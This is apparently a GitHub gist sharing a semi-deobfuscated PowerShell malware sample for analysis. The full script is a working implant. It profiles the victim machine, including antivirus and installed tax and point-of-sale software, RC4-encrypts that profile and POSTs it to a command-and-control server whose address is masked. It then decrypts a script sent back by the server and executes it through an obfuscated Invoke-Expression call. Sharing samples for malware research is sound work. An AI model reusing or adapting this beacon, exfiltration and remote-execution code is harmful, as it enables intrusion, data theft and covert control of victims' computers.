Created
May 29, 2019 13:22
-
-
Save jdferrell3/40548c3ccf1b0ff37515e6b870c362a7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Semi-deobfuscated PowerShell from malware analysis | |
function sdnfjshdklfhlj { | |
$ag = @{ | |
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY'); | |
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH'; | |
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck')); | |
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat') | |
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp'); | |
encutf = [System.Text.Encoding]::UTF8; | |
pref = ("{0}{1}"-f'g','ata='); | |
ver = ("{1}{2}{0}" -f '0.9','p.','1.') | |
} | |
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{1}{2}" -f 'System','.Sec','urity')); | |
$Null = [Reflection.Assembly]::LoadWithPartialName(("{0}{2}{1}" -f'Sy','.Core','stem')); | |
$ErrorActionPreference = ("{3}{1}{2}{0}"-f'nue','ent','lyConti','Sil'); | |
function Test-Administrator | |
{ | |
$user = [Security.Principal.WindowsIdentity]::GetCurrent(); | |
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator) | |
} | |
function Get-Soft { | |
param ( | |
[Parameter(ValueFromPipeline=$true)] | |
[string[]]$ComputerName = $env:COMPUTERNAME, | |
# NameRegex = (Opera|Firefox|Chrome|TAX|OLT|LACERTE|PROSERIES|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|Protect|Point of Sale|POS) | |
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124)) | |
) | |
foreach ($comp in $ComputerName) { | |
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92) | |
foreach ($key in $keys) { | |
try { | |
$apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{0}{1}{2}" -f 'LocalMa','c','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames() | |
} catch { | |
continue | |
} | |
foreach ($app in $apps) { | |
$program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(("{1}{0}{2}" -f'alMac','Loc','hine'),$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app") | |
$name = $program.GetValue(("{0}{2}{1}" -f'Displ','ame','ayN')) | |
$str = '' | |
if ($name -and $name -match $NameRegex) { | |
$str += $name + ';' | |
$str | |
} | |
} | |
} | |
} | |
} | |
function Get-AV { | |
try { | |
Get-WmiObject -Namespace ((("{3}{0}{4}{1}{5}{2}"-f 'ootM','Se','yCenter2','r','lV','curit')).REPLace(([Char]77+[Char]108+[Char]86),[STRing][Char]92)) -Class AntiVirusProduct -ComputerName $env:computername | % { $e += $_.displayName + ';'} | |
if ($e){ | |
$e[0..($e.Length-2)]-join'' | |
}else{ | |
"N/A" | |
} | |
} catch { | |
"N/A" | |
} finally { | |
[GC]::Collect() | |
} | |
} | |
function Get-CPU { | |
try { | |
Get-WmiObject -Namespace ((("{2}{0}{1}" -f'rCI','MV2','rootxa')).rEPLacE('xar',[STrING][cHAr]92)) -Class Win32_Processor -ComputerName $env:computername | % { $e += $_.Name + ';'} | |
$e[0..($e.Length-2)]-join'' | |
} | |
catch {"N/A"} | |
finally{[GC]::Collect()} | |
} | |
function SysMachineID { | |
$HashName = "MD5" | |
[string]$ret = "" | |
$hd = gwmi win32_bios | |
$ret = $hd[("{2}{1}{0}"-f 'umber','rialN','Se')].ToString() | |
[string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower(); | |
$StringBuilder = New-Object System.Text.StringBuilder | |
[System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ | |
[Void]$StringBuilder.Append($_.ToString("x2")) | |
} | |
$StringBuilder.ToString().ToLower() | |
} | |
function HasGet-Bretring($ht) { | |
$first = $true | |
foreach($pair in $ht.GetEnumerator()) { | |
if ($first) { | |
$first = $false | |
} else { | |
$output += ';' | |
} | |
$output+="{0}" -f $($pair.Value) | |
} | |
$output | |
} | |
function Get-workconfig { | |
Get-WmiObject Win32_NetworkAdapter -Filter ("{5}{3}{4}{0}{6}{2}{1}" -f 'nSt','2','tus=','Connec','tio','Net','a') | | |
ForEach-Object { | |
$result = 1 | Select-Object Name, IP, MAC, ID | |
$result.Name = $_.Name | |
$result.MAC = $_.MacAddress | |
$result.ID = $_.DeviceID | |
$config = $_.GetRelated(("{5}{6}{3}{7}{0}{2}{1}{4}"-f'a','C','pter','et','onfiguration','Wi','n32_N','workAd')) | |
$result.IP = $config | Select-Object -expand IPAddress | |
$result | |
} | |
} | |
function SysMachineinfo { | |
$str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; | |
$string = "" | |
foreach($c in Get-workconfig) { | |
[string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID | |
$ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6]; | |
[string]$ip = $c.IP[0]; | |
if(!$ip -or $ip.trim() -eq '') { | |
$ip=("{2}{0}{1}" -f '0','.0','0.0.') | |
}; | |
$lanconf = @{ | |
id = $ID | |
ip = $ip; | |
mac = $macadr; | |
name = $lanname; | |
} | |
$string += HasGet-Bretring $lanconf | |
} | |
$str += "|$string"; | |
$str += '|' + $(Get-WmiObject -class Win32_OperatingSystem).Caption | |
if(([Environment]::UserName).ToLower() -eq ("{0}{1}"-f'syste','m')) { | |
$str += (('3GyTrue') -replACe'3Gy',[ChAR]124) | |
} else { | |
$str += '|'+ $(Test-Administrator) | |
} | |
[void] [Reflection.Assembly]::LoadWithPartialName(("{2}{4}{3}{5}{1}{0}" -f'ws.Forms','ndo','S','m.W','yste','i')) | |
$Screens = [system.windows.forms.screen]::AllScreens | |
foreach ($Screen in $Screens) { | |
$Width = $Screen.Bounds.Width | |
$Height = $Screen.Bounds.Height | |
} | |
$str += '|' + "$Width`x$Height" | |
$n = [System.Diagnostics.Process]::GetCurrentProcess() | |
$str += '|'+ $n.ProcessName+'|'+$n.Id | |
$str += '|' + $PSVersionTable.PSVersion.Major | |
$str += '|' + (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture | |
$str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption | |
$str += '|' + $(Get-SystemUptime) | |
$str += '|' + $(Get-CPU) | |
$str += '|' + $ag['ver'] | |
$str += '|' + ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString() | |
$str += '|' + $(Get-AV) | |
$str += '|' + $(IsVirtual) | |
$str.split('|') |% {$e += "inf=$_|"} | |
$e[0..($e.Length-2)]-join'' | |
} | |
function Get-SystemUptime { | |
$lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime) ") | |
$uptime = (Get-Date) - $lastboot | |
return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s") | |
} | |
Function IsVirtual | |
{ | |
$wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber | |
$wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer | |
$ResultProps = @{ | |
ComputerName = $computer | |
BIOSVersion = $wmibios.Version | |
SerialNumber = $wmibios.serialnumber | |
Manufacturer = $wmisystem.manufacturer | |
Model = $wmisystem.model | |
IsVirtual = $false | |
VirtualType = $null | |
} | |
if ($wmibios.SerialNumber -like ("{1}{0}"-f 'VMware*','*')) { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{0}{2}{3}{4}{1}"-f'Virt','Ware','ual ','- V','M') | |
} | |
else { | |
switch -wildcard ($wmibios.Version) { | |
("{1}{0}" -f 'TUAL','VIR') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f ' - Hy','Vi','per-V','rtua','l') | |
} | |
("{0}{1}"-f 'A',' M I') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{2}{6}{5}{3}{0}{4}"-f'ual ','Virt','ua','rt','PC',' - Vi','l') | |
} | |
("{1}{0}"-f'*','*Xen') { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{2}{0}"-f'al - Xen','Vi','tu','r') | |
} | |
} | |
} | |
if (-not $ResultProps.IsVirtual) { | |
if ($wmisystem.manufacturer -like ("{2}{1}{0}"-f't*','osof','*Micr')) | |
{ | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{0}{2}{3}" -f ' - Hy','Virtual','p','er-V') | |
} | |
elseif ($wmisystem.manufacturer -like ("{1}{0}{2}" -f 'ar','*VMW','e*')) | |
{ | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{3}{2}{0}{1}" -f 'l - VMW','are','rtua','Vi') | |
} | |
elseif ($wmisystem.model -like ("{2}{1}{0}"-f'ual*','irt','*V')) { | |
$ResultProps.IsVirtual = $true | |
$ResultProps.VirtualType = ("{1}{3}{4}{0}{2}"-f 'ch','Unknown Virtu','ine','al ','Ma') | |
} | |
} | |
$results += New-Object PsObject -Property $ResultProps | |
return $ResultProps.IsVirtual | |
} | |
function vzuhdata{ | |
# encutf | |
$buffer = $ag[("{1}{0}" -f'cutf','en')].GetBytes($args[0]) | |
try { | |
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; | |
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0; | |
# http://YYY.YY.YYY.YYY/ltjzhcbutq/ozxvgzfxkvm/vcubhhhqmtefvdjywrrylhqmxh.php | |
$urr = $($ag['srv'] + '/' + $($u={sal er Get-Random;$(-join(1..$(er -Minimum 7 -Maximum 37)|%{[char][int]((65..90)+(97..122)|er)})).ToLower()};'{0}/{1}/{2}.{3}' -f $(. $u), $(. $u), $(. $u), $(@('php','jsp','asp')| Get-Random))) | |
[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($urr) | |
$webRequest.Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); | |
$webRequest.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; | |
$webRequest.Timeout = 600000; | |
$webRequest.Method = ("{0}{1}"-f 'POS','T') | |
$webRequest.UserAgent = $ag[("{1}{0}"-f 'ag','us')] | |
$webRequest.Headers.Add(("{1}{0}"-f 'okie','Co'), $ag[("{1}{0}" -f 'id','se')]) | |
$webRequest.ContentType = $ag[("{1}{2}{0}" -f'pe','co','nTy')] | |
$webRequest.Referer = $ag[("{1}{0}" -f'effer','r')] | |
$webRequest.ContentLength = $buffer.Length | |
$requestStream = $webRequest.GetRequestStream() | |
$requestStream.Write($buffer, 0, $buffer.Length) | |
$requestStream.Flush() | |
$requestStream.Close() | |
[System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
$streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
$result = $streamReader.ReadToEnd() | |
$webResponse.Close() | |
$result | |
} catch { | |
$_.Exception.Message | |
} | |
} | |
function getexteip { | |
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; | |
[SysTEm.Net.SeRvICePoIntMAnaGEr]::Expect100ConTINuE=0; | |
$Wc=New-ObJeCt SYsTEM.NET.WeBCliENt; | |
$u=("{3}{17}{6}{12}{7}{8}{5}{15}{11}{18}{14}{0}{4}{13}{16}{19}{1}{9}{2}{10}" -f ' ','nfoPa','1','Mozill','S','0; Wind','/4.0 (',' M','SIE 6.','th.',')',' ','compatible;','V1;',' 5.1;','ows',' ','a','NT','I'); | |
$Wc.HeADeRS.AdD(("{0}{2}{1}" -f 'Use','nt','r-Age'),$u); | |
$Wc.Proxy=[SYSTem.NEt.WEBREQUeSt]::DefAulTWebPRoXY; | |
$WC.PRoXy.CReDEntIALs=[SYsTEM.NET.CReDentIAlCAcHe]::DefaUlTNetwoRKCREdENTIalS; | |
$rr = $Wc.DoWnloaDSTRIng(("{2}{1}{5}{0}{6}{3}{4}"-f'info/h','ttp','h','chec','ker.php','s://ipinfo.','tml/ip_')); | |
$regex = [regex]'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; $($regex.Matches($rr)).value | |
} | |
function rc4 { | |
param([Byte[]]$data,[Byte[]]$key) | |
[Byte[]]$buffer = New-Object Byte[] $data.Length;$data.CopyTo($buffer, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256; | |
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $key[$i % $key.Length];} | |
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0; | |
for ($x = 0; $x -lt $buffer.Length; $x++){$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;[int]$t = ($s[$i] + $s[$j]) % 256;$buffer[$x] = $buffer[$x] -bxor $s[$t];} | |
return $buffer | |
} | |
function Encrypt { | |
param([string]$data) | |
[Convert]::ToBase64String($(rc4 $ag[("{1}{0}" -f 'f','encut')].GetBytes($data) $ag[("{1}{0}" -f'cutf','en')].GetBytes($ag[("{1}{0}"-f 'kkey','s')]))) | |
} | |
function Decrypt { | |
param([string]$data) | |
$ag[("{1}{2}{0}"-f'f','e','ncut')].GetString($(rc4 $([System.Convert]::FromBase64String($data)) $ag[("{0}{1}"-f 'enc','utf')].GetBytes($ag[("{0}{1}"-f 'skk','ey')]))) | |
} | |
function get-construct { | |
param([string]$out) | |
$ag.add(("{0}{1}"-f'ske','y'), $($out[($out.length-33)..($out.length-2)]-join '')) | |
$ag.add('scr', $($out[0..($out.length-34)]-join '')) | |
} | |
# seid, routed | |
$ag.add(("{0}{1}"-f'sei','d'), ("{1}{0}{2}"-f 'out','r','ed:') + $(Encrypt $(SysMachineID))); | |
if (Test-Administrator) { | |
$eb='p=1' | |
} else { | |
$eb='p=0' | |
} | |
$de = Decrypt $(vzuhdata $($($ag[("{0}{1}"-f'p','ref')] + $(Encrypt $(((("{1}{0}{2}"-f'a','act=p','ll{0}')) -F [CHAr]124)+ $eb + ((("{2}{1}{0}" -f'r=','e','HDYv')).REpLACe('HDY','|'))+ $ag['ver'] + ((("{1}{0}"-f'aopcn=','O')).rePLACe('Oao',[strInG][cHar]124)) + $PSVersionTable.PSVersion.Major))))) | |
$k=$de[$de.length-1] -join '' | |
if ($k -eq 0) { | |
get-construct $(Decrypt $(vzuhdata $($ag[("{0}{1}" -f'pr','ef')] + $(Encrypt $(((("{0}{1}{2}"-f'act','=fallK','ik')) -RePLaCE ([CHAR]75+[CHAR]105+[CHAR]107),[CHAR]124)+ $(SysMachineinfo)))))) | |
} else { | |
get-construct $de | |
} | |
. ($eNV:coMsPec[4,26,25]-JoIN'') $ag['scr']; | |
$de=$null; | |
$ag.Remove('scr'); | |
$ag.Remove(("{0}{1}" -f 'p','ref')); | |
$ag.Remove(("{1}{0}" -f 'key','sk')); | |
$ag.Remove('ver'); | |
$ag.Remove(("{0}{1}" -f 'encut','f')) | |
$Error.Clear() | |
[GC]::Collect() | |
[GC]::WaitForPendingFinalizers() | |
Get-federerfegegfeg $ag | |
} | |
sdnfjshdklfhlj |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment